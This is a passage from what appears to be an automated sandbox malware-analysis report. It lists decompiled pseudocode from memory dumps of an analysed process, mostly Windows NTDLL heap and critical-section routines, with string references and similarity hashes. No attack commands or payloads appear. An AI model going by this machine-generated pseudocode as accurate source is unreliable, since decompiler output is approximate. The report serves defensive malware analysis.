                                                                                                                                    									 *_a4 = _t109;
                                                                                                                                    									_t51 = 0;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return _t51;
                                                                                                                                    			}


























                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                    • Instruction ID: 30abc97c4fa65044ff29ddfe5b628d9b165a97872961be77b97b2fe1bc5a9e04
                                                                                                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                                    • Instruction Fuzzy Hash: D5518D716047109FD320DF29C840A6BBBF9FF48754F00896DF9A6876A0E7B4E954CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                    			E04B6D294(void* __ecx, char __edx, void* __eflags) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				char _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				char* _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				char _v76;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				intOrPtr _v88;
                                                                                                                                    				char _v92;
                                                                                                                                    				intOrPtr _v96;
                                                                                                                                    				intOrPtr _v100;
                                                                                                                                    				char _v104;
                                                                                                                                    				char _v105;
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed int _t35;
                                                                                                                                    				char _t38;
                                                                                                                                    				signed int _t40;
                                                                                                                                    				signed int _t44;
                                                                                                                                    				signed int _t52;
                                                                                                                                    				void* _t53;
                                                                                                                                    				void* _t55;
                                                                                                                                    				void* _t61;
                                                                                                                                    				intOrPtr _t62;
                                                                                                                                    				void* _t64;
                                                                                                                                    				signed int _t65;
                                                                                                                                    				signed int _t66;
                                                                                                                                    
                                                                                                                                    				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                                                                    				_v105 = __edx;
                                                                                                                                    				_push( &_v92);
                                                                                                                                    				_t52 = 0;
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push( &_v104);
                                                                                                                                    				_push(0);
                                                                                                                                    				_t59 = __ecx;
                                                                                                                                    				_t55 = 2;
                                                                                                                                    				if(E04B54120(_t55, __ecx) < 0) {
                                                                                                                                    					_t35 = 0;
                                                                                                                                    					L8:
                                                                                                                                    					_pop(_t61);
                                                                                                                                    					_pop(_t64);
                                                                                                                                    					_pop(_t53);
                                                                                                                                    					return E04B7B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                                                                    				}
                                                                                                                                    				_v96 = _v100;
                                                                                                                                    				_t38 = _v92;
                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                    					_v104 = _t38;
                                                                                                                                    					_v100 = _v88;
                                                                                                                                    					_t40 = _v84;
                                                                                                                                    				} else {
                                                                                                                                    					_t40 = 0;
                                                                                                                                    				}
                                                                                                                                    				_v72 = _t40;
                                                                                                                                    				_v68 =  &_v104;
                                                                                                                                    				_push( &_v52);
                                                                                                                                    				_v76 = 0x18;
                                                                                                                                    				_push( &_v76);
                                                                                                                                    				_v64 = 0x40;
                                                                                                                                    				_v60 = _t52;
                                                                                                                                    				_v56 = _t52;
                                                                                                                                    				_t44 = E04B798D0();
                                                                                                                                    				_t62 = _v88;
                                                                                                                                    				_t65 = _t44;
                                                                                                                                    				if(_t62 != 0) {
                                                                                                                                    					asm("lock xadd [edi], eax");
                                                                                                                                    					if((_t44 | 0xffffffff) != 0) {
                                                                                                                                    						goto L4;
                                                                                                                                    					}
                                                                                                                                    					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                                                                    					E04B795D0();
                                                                                                                                    					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                                                                    					goto L4;
                                                                                                                                    				} else {
                                                                                                                                    					L4:
                                                                                                                                    					L04B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                                                                    					if(_t65 >= 0) {
                                                                                                                                    						_t52 = 1;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                                                                    							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t35 = _t52;
                                                                                                                                    					goto L8;
                                                                                                                                    				}
                                                                                                                                    			}


































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 0-2766056989
                                                                                                                                    • Opcode ID: 4e063c4650373131942f475b0774f973434cc4efe9528ed5cc908295091796a6
                                                                                                                                    • Instruction ID: 3c685e3104ecb2aabaa9947bfc3daa8b41ab75078f371b2313714fafc21cfc23
                                                                                                                                    • Opcode Fuzzy Hash: 4e063c4650373131942f475b0774f973434cc4efe9528ed5cc908295091796a6
                                                                                                                                    • Instruction Fuzzy Hash: D83172B17083459FD721DF28D980A5BBBECEB85654F00096EF99683210E639ED04DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                    			E04BE8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				intOrPtr _t35;
                                                                                                                                    				void* _t41;
                                                                                                                                    
                                                                                                                                    				_t40 = __esi;
                                                                                                                                    				_t39 = __edi;
                                                                                                                                    				_t38 = __edx;
                                                                                                                                    				_t35 = __ecx;
                                                                                                                                    				_t34 = __ebx;
                                                                                                                                    				_push(0x74);
                                                                                                                                    				_push(0x4c10d50);
                                                                                                                                    				E04B8D0E8(__ebx, __edi, __esi);
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                                                                    					E04BC5720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                                                                    					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                                                                    						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                                                    						asm("int3");
                                                                                                                                    						 *(_t41 - 4) = 0xfffffffe;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *(_t41 - 4) = 1;
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                                                                    				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x64)) = L04B8DEF0;
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                                                                    				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                                                                    				_push(_t41 - 0x70);
                                                                                                                                    				L04B8DEF0(1, _t38);
                                                                                                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                                                                                                    				return E04B8D130(_t34, _t39, _t40);
                                                                                                                                    			}






                                                                                                                                    Strings
                                                                                                                                    • Critical error detected %lx, xrefs: 04BE8E21
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Critical error detected %lx
                                                                                                                                    • API String ID: 0-802127002
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 04BCFF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                    • API String ID: 0-1911121157
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E04C05BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				signed int _t296;
                                                                                                                                    				signed char _t298;
                                                                                                                                    				signed int _t301;
                                                                                                                                    				signed int _t306;
                                                                                                                                    				signed int _t310;
                                                                                                                                    				signed char _t311;
                                                                                                                                    				intOrPtr _t312;
                                                                                                                                    				signed int _t313;
                                                                                                                                    				void* _t327;
                                                                                                                                    				signed int _t328;
                                                                                                                                    				intOrPtr _t329;
                                                                                                                                    				intOrPtr _t333;
                                                                                                                                    				signed char _t334;
                                                                                                                                    				signed int _t336;
                                                                                                                                    				void* _t339;
                                                                                                                                    				signed int _t340;
                                                                                                                                    				signed int _t356;
                                                                                                                                    				signed int _t362;
                                                                                                                                    				short _t367;
                                                                                                                                    				short _t368;
                                                                                                                                    				short _t373;
                                                                                                                                    				signed int _t380;
                                                                                                                                    				void* _t382;
                                                                                                                                    				short _t385;
                                                                                                                                    				signed short _t392;
                                                                                                                                    				signed char _t393;
                                                                                                                                    				signed int _t395;
                                                                                                                                    				signed char _t397;
                                                                                                                                    				signed int _t398;
                                                                                                                                    				signed short _t402;
                                                                                                                                    				void* _t406;
                                                                                                                                    				signed int _t412;
                                                                                                                                    				signed char _t414;
                                                                                                                                    				signed short _t416;
                                                                                                                                    				signed int _t421;
                                                                                                                                    				signed char _t427;
                                                                                                                                    				intOrPtr _t434;
                                                                                                                                    				signed char _t435;
                                                                                                                                    				signed int _t436;
                                                                                                                                    				signed int _t442;
                                                                                                                                    				signed int _t446;
                                                                                                                                    				signed int _t447;
                                                                                                                                    				signed int _t451;
                                                                                                                                    				signed int _t453;
                                                                                                                                    				signed int _t454;
                                                                                                                                    				signed int _t455;
                                                                                                                                    				intOrPtr _t456;
                                                                                                                                    				intOrPtr* _t457;
                                                                                                                                    				short _t458;
                                                                                                                                    				signed short _t462;
                                                                                                                                    				signed int _t469;
                                                                                                                                    				intOrPtr* _t474;
                                                                                                                                    				signed int _t475;
                                                                                                                                    				signed int _t479;
                                                                                                                                    				signed int _t480;
                                                                                                                                    				signed int _t481;
                                                                                                                                    				short _t485;
                                                                                                                                    				signed int _t491;
                                                                                                                                    				signed int* _t494;
                                                                                                                                    				signed int _t498;
                                                                                                                                    				signed int _t505;
                                                                                                                                    				intOrPtr _t506;
                                                                                                                                    				signed short _t508;
                                                                                                                                    				signed int _t511;
                                                                                                                                    				void* _t517;
                                                                                                                                    				signed int _t519;
                                                                                                                                    				signed int _t522;
                                                                                                                                    				void* _t523;
                                                                                                                                    				signed int _t524;
                                                                                                                                    				void* _t528;
                                                                                                                                    				signed int _t529;
                                                                                                                                    
                                                                                                                                    				_push(0xd4);
                                                                                                                                    				_push(0x4c11178);
                                                                                                                                    				E04B8D0E8(__ebx, __edi, __esi);
                                                                                                                                    				_t494 = __edx;
                                                                                                                                    				 *(_t528 - 0xcc) = __edx;
                                                                                                                                    				_t511 = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                                                                    				 *(_t528 - 0xbc) = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                                                                    				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                                                                    				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                                                                    				_t427 = 0;
                                                                                                                                    				 *(_t528 - 0x74) = 0;
                                                                                                                                    				 *(_t528 - 0x9c) = 0;
                                                                                                                                    				 *(_t528 - 0x84) = 0;
                                                                                                                                    				 *(_t528 - 0xac) = 0;
                                                                                                                                    				 *(_t528 - 0x88) = 0;
                                                                                                                                    				 *(_t528 - 0xa8) = 0;
                                                                                                                                    				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                                                                    				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                                                                    					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						_t421 = E04C04C56(0, __edx, __ecx, __eflags);
                                                                                                                                    						__eflags = _t421;
                                                                                                                                    						if(_t421 != 0) {
                                                                                                                                    							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                                                                    							E04B7D000(0x410);
                                                                                                                                    							 *(_t528 - 0x18) = _t529;
                                                                                                                                    							 *(_t528 - 0x9c) = _t529;
                                                                                                                                    							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                                                                    							E04C05542(_t528 - 0x9c, _t528 - 0x84);
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					_t435 = _t427;
                                                                                                                                    					 *(_t528 - 0xd0) = _t435;
                                                                                                                                    					_t474 = _t511 + 0x65;
                                                                                                                                    					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                                    					_t511 = 0x18;
                                                                                                                                    					while(1) {
                                                                                                                                    						 *(_t528 - 0xa0) = _t427;
                                                                                                                                    						 *(_t528 - 0xbc) = _t427;
                                                                                                                                    						 *(_t528 - 0x80) = _t427;
                                                                                                                                    						 *(_t528 - 0x78) = 0x50;
                                                                                                                                    						 *(_t528 - 0x79) = _t427;
                                                                                                                                    						 *(_t528 - 0x7a) = _t427;
                                                                                                                                    						 *(_t528 - 0x8c) = _t427;
                                                                                                                                    						 *(_t528 - 0x98) = _t427;
                                                                                                                                    						 *(_t528 - 0x90) = _t427;
                                                                                                                                    						 *(_t528 - 0xb0) = _t427;
                                                                                                                                    						 *(_t528 - 0xb8) = _t427;
                                                                                                                                    						_t296 = 1 << _t435;
                                                                                                                                    						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                                                    						__eflags = _t436 & _t296;
                                                                                                                                    						if((_t436 & _t296) != 0) {
                                                                                                                                    							goto L92;
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *((char*)(_t474 - 1));
                                                                                                                                    						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                                                    							goto L92;
                                                                                                                                    						}
                                                                                                                                    						_t301 =  *_t474;
                                                                                                                                    						__eflags = _t494[1] - _t301;
                                                                                                                                    						if(_t494[1] <= _t301) {
                                                                                                                                    							L10:
                                                                                                                                    							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                                                    							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                                                    								L12:
                                                                                                                                    								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                                                                    								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                                                    									goto L92;
                                                                                                                                    								}
                                                                                                                                    								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                                                    								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                                                    								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                                                    									goto L92;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                                                    								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                                                    									goto L92;
                                                                                                                                    								}
                                                                                                                                    								L15:
                                                                                                                                    								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                                                    								 *(_t528 - 0xc0) = _t306;
                                                                                                                                    								 *(_t528 - 0xa4) = _t306;
                                                                                                                                    								__eflags =  *0x4c260e8;
                                                                                                                                    								if( *0x4c260e8 != 0) {
                                                                                                                                    									__eflags = _t306 - 0x40;
                                                                                                                                    									if(_t306 < 0x40) {
                                                                                                                                    										L20:
                                                                                                                                    										asm("lock inc dword [eax]");
                                                                                                                                    										_t310 =  *0x4c260e8; // 0x0
                                                                                                                                    										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                                                    										__eflags = _t311 & 0x00000001;
                                                                                                                                    										if((_t311 & 0x00000001) == 0) {
                                                                                                                                    											 *(_t528 - 0xa0) = _t311;
                                                                                                                                    											_t475 = _t427;
                                                                                                                                    											 *(_t528 - 0x74) = _t427;
                                                                                                                                    											__eflags = _t475;
                                                                                                                                    											if(_t475 != 0) {
                                                                                                                                    												L91:
                                                                                                                                    												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                    												goto L92;
                                                                                                                                    											}
                                                                                                                                    											asm("sbb edi, edi");
                                                                                                                                    											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                                                    											_t511 = _t498;
                                                                                                                                    											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                    											__eflags =  *(_t312 - 5) & 1;
                                                                                                                                    											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                                                    												_push(_t528 - 0x98);
                                                                                                                                    												_push(0x4c);
                                                                                                                                    												_push(_t528 - 0x70);
                                                                                                                                    												_push(1);
                                                                                                                                    												_push(0xfffffffa);
                                                                                                                                    												_t412 = E04B79710();
                                                                                                                                    												_t475 = _t427;
                                                                                                                                    												__eflags = _t412;
                                                                                                                                    												if(_t412 >= 0) {
                                                                                                                                    													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                                                    													 *(_t528 - 0x98) = _t414;
                                                                                                                                    													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                                                    													 *(_t528 - 0x8c) = _t416;
                                                                                                                                    													 *(_t528 - 0x79) = 1;
                                                                                                                                    													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                                                    													__eflags = _t511;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                                                    											__eflags = _t446 & 0x00000004;
                                                                                                                                    											if((_t446 & 0x00000004) != 0) {
                                                                                                                                    												__eflags =  *(_t528 - 0x9c);
                                                                                                                                    												if( *(_t528 - 0x9c) != 0) {
                                                                                                                                    													 *(_t528 - 0x7a) = 1;
                                                                                                                                    													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                                                                    													__eflags = _t511;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    											_t313 = 2;
                                                                                                                                    											_t447 = _t446 & _t313;
                                                                                                                                    											__eflags = _t447;
                                                                                                                                    											 *(_t528 - 0xd4) = _t447;
                                                                                                                                    											if(_t447 != 0) {
                                                                                                                                    												_t406 = 0x10;
                                                                                                                                    												_t511 = _t511 + _t406;
                                                                                                                                    												__eflags = _t511;
                                                                                                                                    											}
                                                                                                                                    											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                                                                    											 *(_t528 - 0x88) = _t427;
                                                                                                                                    											__eflags =  *(_t528 + 0x1c);
                                                                                                                                    											if( *(_t528 + 0x1c) <= 0) {
                                                                                                                                    												L45:
                                                                                                                                    												__eflags =  *(_t528 - 0xb0);
                                                                                                                                    												if( *(_t528 - 0xb0) != 0) {
                                                                                                                                    													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                                    													__eflags = _t511;
                                                                                                                                    												}
                                                                                                                                    												__eflags = _t475;
                                                                                                                                    												if(_t475 != 0) {
                                                                                                                                    													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                                                                    													goto L100;
                                                                                                                                    												} else {
                                                                                                                                    													_t494[3] = _t511;
                                                                                                                                    													_t451 =  *(_t528 - 0xa0);
                                                                                                                                    													_t427 = E04B76DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                                                                    													 *(_t528 - 0x88) = _t427;
                                                                                                                                    													__eflags = _t427;
                                                                                                                                    													if(_t427 == 0) {
                                                                                                                                    														__eflags = _t511 - 0xfff8;
                                                                                                                                    														if(_t511 <= 0xfff8) {
                                                                                                                                    															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                                                                    															asm("sbb ecx, ecx");
                                                                                                                                    															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                                                                    														}
                                                                                                                                    														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                                                                    														L100:
                                                                                                                                    														goto L101;
                                                                                                                                    													}
                                                                                                                                    													_t453 =  *(_t528 - 0xa0);
                                                                                                                                    													 *_t494 = _t453;
                                                                                                                                    													_t494[1] = _t427;
                                                                                                                                    													_t494[2] =  *(_t528 - 0xbc);
                                                                                                                                    													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                                                                    													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                                                                    													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                                                                    													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													__eflags =  *(_t528 + 0x14);
                                                                                                                                    													if( *(_t528 + 0x14) == 0) {
                                                                                                                                    														__eflags =  *[fs:0x18] + 0xf50;
                                                                                                                                    													}
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													asm("movsd");
                                                                                                                                    													__eflags =  *(_t528 + 0x18);
                                                                                                                                    													if( *(_t528 + 0x18) == 0) {
                                                                                                                                    														_t454 =  *(_t528 - 0x80);
                                                                                                                                    														_t479 =  *(_t528 - 0x78);
                                                                                                                                    														_t327 = 1;
                                                                                                                                    														__eflags = 1;
                                                                                                                                    													} else {
                                                                                                                                    														_t146 = _t427 + 0x50; // 0x50
                                                                                                                                    														_t454 = _t146;
                                                                                                                                    														 *(_t528 - 0x80) = _t454;
                                                                                                                                    														_t382 = 0x18;
                                                                                                                                    														 *_t454 = _t382;
                                                                                                                                    														 *((short*)(_t454 + 2)) = 1;
                                                                                                                                    														_t385 = 0x10;
                                                                                                                                    														 *((short*)(_t454 + 6)) = _t385;
                                                                                                                                    														 *(_t454 + 4) = 0;
                                                                                                                                    														asm("movsd");
                                                                                                                                    														asm("movsd");
                                                                                                                                    														asm("movsd");
                                                                                                                                    														asm("movsd");
                                                                                                                                    														_t327 = 1;
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                    														_t479 = 0x68;
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    													}
                                                                                                                                    													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                                                                    													if( *(_t528 - 0x79) == _t327) {
                                                                                                                                    														_t524 = _t479 + _t427;
                                                                                                                                    														_t508 =  *(_t528 - 0x8c);
                                                                                                                                    														 *_t524 = _t508;
                                                                                                                                    														_t373 = 2;
                                                                                                                                    														 *((short*)(_t524 + 2)) = _t373;
                                                                                                                                    														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                                                                    														 *((short*)(_t524 + 4)) = 0;
                                                                                                                                    														_t167 = _t524 + 8; // 0x8
                                                                                                                                    														E04B7F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                                                                    														_t529 = _t529 + 0xc;
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                    														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    														_t380 =  *(_t528 - 0x80);
                                                                                                                                    														__eflags = _t380;
                                                                                                                                    														if(_t380 != 0) {
                                                                                                                                    															_t173 = _t380 + 4;
                                                                                                                                    															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                                                    															__eflags =  *_t173;
                                                                                                                                    														}
                                                                                                                                    														_t454 = _t524;
                                                                                                                                    														 *(_t528 - 0x80) = _t454;
                                                                                                                                    														_t327 = 1;
                                                                                                                                    														__eflags = 1;
                                                                                                                                    													}
                                                                                                                                    													__eflags =  *(_t528 - 0xd4);
                                                                                                                                    													if( *(_t528 - 0xd4) == 0) {
                                                                                                                                    														_t505 =  *(_t528 - 0x80);
                                                                                                                                    													} else {
                                                                                                                                    														_t505 = _t479 + _t427;
                                                                                                                                    														_t523 = 0x10;
                                                                                                                                    														 *_t505 = _t523;
                                                                                                                                    														_t367 = 3;
                                                                                                                                    														 *((short*)(_t505 + 2)) = _t367;
                                                                                                                                    														_t368 = 4;
                                                                                                                                    														 *((short*)(_t505 + 6)) = _t368;
                                                                                                                                    														 *(_t505 + 4) = 0;
                                                                                                                                    														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                                                    														_t327 = 1;
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                    														_t479 = _t479 + _t523;
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    														__eflags = _t454;
                                                                                                                                    														if(_t454 != 0) {
                                                                                                                                    															_t186 = _t454 + 4;
                                                                                                                                    															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                                                    															__eflags =  *_t186;
                                                                                                                                    														}
                                                                                                                                    														 *(_t528 - 0x80) = _t505;
                                                                                                                                    													}
                                                                                                                                    													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                                                    													if( *(_t528 - 0x7a) == _t327) {
                                                                                                                                    														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                                                    														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                                                    														E04B7F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                                                    														_t529 = _t529 + 0xc;
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                                    														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                                                    														 *(_t528 - 0x78) = _t479;
                                                                                                                                    														__eflags = _t505;
                                                                                                                                    														if(_t505 != 0) {
                                                                                                                                    															_t199 = _t505 + 4;
                                                                                                                                    															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                                                    															__eflags =  *_t199;
                                                                                                                                    														}
                                                                                                                                    														_t505 =  *(_t528 - 0xd4);
                                                                                                                                    														 *(_t528 - 0x80) = _t505;
                                                                                                                                    													}
                                                                                                                                    													__eflags =  *(_t528 - 0xa8);
                                                                                                                                    													if( *(_t528 - 0xa8) != 0) {
                                                                                                                                    														_t356 = _t479 + _t427;
                                                                                                                                    														 *(_t528 - 0xd4) = _t356;
                                                                                                                                    														_t462 =  *(_t528 - 0xac);
                                                                                                                                    														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                                                    														_t485 = 0xc;
                                                                                                                                    														 *((short*)(_t356 + 2)) = _t485;
                                                                                                                                    														 *(_t356 + 6) = _t462;
                                                                                                                                    														 *((short*)(_t356 + 4)) = 0;
                                                                                                                                    														_t211 = _t356 + 8; // 0x9
                                                                                                                                    														E04B7F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                                                    														E04B7FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                                                    														_t529 = _t529 + 0x18;
                                                                                                                                    														_t427 =  *(_t528 - 0x88);
                                                                                                                                    														 *(_t427 + 4) =  *(_t427 + 4) | 1;
